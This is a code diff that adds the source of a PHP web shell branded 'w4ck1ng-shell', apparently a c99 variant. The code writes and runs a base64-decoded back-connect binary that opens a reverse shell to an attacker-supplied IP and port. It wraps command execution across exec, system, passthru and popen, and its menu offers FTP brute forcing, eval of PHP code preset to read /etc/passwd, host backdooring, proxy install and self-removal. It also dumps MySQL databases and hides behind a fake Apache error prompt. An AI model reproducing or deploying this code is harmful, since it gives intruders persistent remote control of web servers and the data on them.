+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
